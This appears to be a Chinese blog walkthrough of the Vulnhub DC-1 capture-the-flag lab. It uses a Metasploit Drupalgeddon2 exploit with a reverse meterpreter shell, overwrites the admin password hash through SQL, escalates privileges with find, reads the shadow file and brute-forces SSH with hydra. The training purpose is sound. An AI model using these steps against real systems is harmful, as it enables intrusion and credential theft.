DC-1靶机实战和分析
前言
我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 想要了解SQL注入原理的可以看我的这两篇文章: https://www.cnblogs.com/lxfweb/p/13236372.html https://www.cnblogs.com/lxfweb/p/13275582.html 想要了解XSS原理的可以看我的这两篇文章: https://www.cnblogs.com/lxfweb/p/12709061.html https://www.cnblogs.com/lxfweb/p/13286271.html
目标探测
渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对目标机进行主机发现。因为都在局域网,所以使用内网扫描。
命令:arp-scan -l
发现主机IP后,使用nmap进行端口扫描。
命令:nmap -v -A 192.168.9.138
发现目标机开放了22、80、111端口。
寻找flag1
现在我们以80端口作为突破口。通过指纹识别,这里用到的是whatweb,发现是Drupal cms 版本是7。下面使用MSF进行渗透攻击。打开工具,搜索Drupal的相关模块。
这里我选择第4个模块。读者可以尝试其他模块。
输入命令:use exploit/unix/webapp/drupal_drupalgeddon2
加载exploit。然后查看相关payload,输入命令:show payloads
这里选择15,输入:set payload php/meterpreter/reverse_tcp
接着输入:show options
打开配置选项。
标为yes的都是必须配置的。现在配置一下RHOSTS(目标机IP),LHOSTS(攻击机IP),其他默认就行了。 发现获取到了meterpreter shell。现在查看一下目录。
发现目标,找到flag1。
寻找flag2
查看flag1文件,发现有提示,咱们寻找配置文件。 接下来进入sites目录下,接着进入default目录。查看settings.php文件。
找到了flag2。
寻找flag3
我们发现配置文件中有数据库账号和密码。现在尝试登陆数据库。
现在进入目标机shell环境,查看端口情况。命令:netstat -ano
我们注意到,数据库只允许本地连接。所以,我们需要反弹一个shell出来。 采用python调用系统命令:
python -c 'import pty;pty.spawn("/bin/bash")'
发现反弹成功,接下来输入数据库账号密码连接MySQL数据库。
下面,我们查看库,查看表。
找关键的表,发现里面存在users表。打开它。
发现了admin账户和密码。但是这个密码有点复杂,破解有点困难。所以想想其他的方法。这里我们登陆了对方数据库,所以,我们采用对方的加密方式覆盖掉原来的密码就可以了。
先调用命令生成咱们设置的密文。明文是xfaicl。命令:php scripts/password-hash.sh xfaicl
接着替换掉原来的密码。
update users set pass="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1
<s="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1;
替换成功后,咱们登陆网站。依次点击,发现flag3。
寻找flag4
点击flag3后,关注点放到passwd文件和shadow文件。Linux为了考虑安全性,用单独的shadow文件存储Linux用户的密码信息,并且只有root用户有权限读取此文件。所以下一步,我们要考虑的是提权了。 采用find提权。
提权成功后,查看shadow文件。
发现flag4是一个账户。猜测是ssh账户,这里尝试暴力破解。使用hydra破解成功。
破解到密码是orange,接下来登陆ssh。发现flag4,查看它。
里面内容说,还有一个flag4,在root目录下,刚才咱们已经提升权限了。所以直接查看。
小结
目标靶机一共存在5个flag,咱们已经全部找到,上面用到的一些方法希望对大家有帮助。
- Event Loop
- 把图片变成字体,然后在引入到网页
- Flutter环境搭建
- java.net.ConnectException: Call From slaver1/192.168.19.128 to slaver1:8020 failed on connection exc
- 18/03/18 04:53:44 WARN TaskSchedulerImpl: Initial job has not accepted any resources; check your clu
- 技术干货 | Hadoop3.0稳定版安装攻略来啦!
- ios逆向工具MonkeyDev简介
- 自定义下拉列表
- 身份证号码验证算法
- 技术干货 | hive安装部署
- js图片的预加载功能
- 简单理解通过原型继承
- 为我们的Web添加HTTPS支持
- 技术干货 | hbase配置详解
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- PHP+Ajax实现的检测用户名功能简单示例
- Yii框架学习笔记之session与cookie简单操作示例
- Ajax+Jpgraph实现的动态折线图功能示例
- Python闭包及装饰器运行原理解析
- Django中Q查询及Q()对象 F查询及F()对象用法
- keras.layer.input()用法说明
- python入门:argparse浅析 nargs='+'作用
- PHP7导出Excel报ERR_EMPTY_RESPONSE解决方法
- YII框架行为behaviors用法示例
- 浅谈Python里面None True False之间的区别
- python如何导入依赖包
- 深入理解Python 多线程
- Yii2框架自定义验证规则操作示例
- 浅析PHP 中move_uploaded_file 上传中文文件名失败
- 结束运行python的方法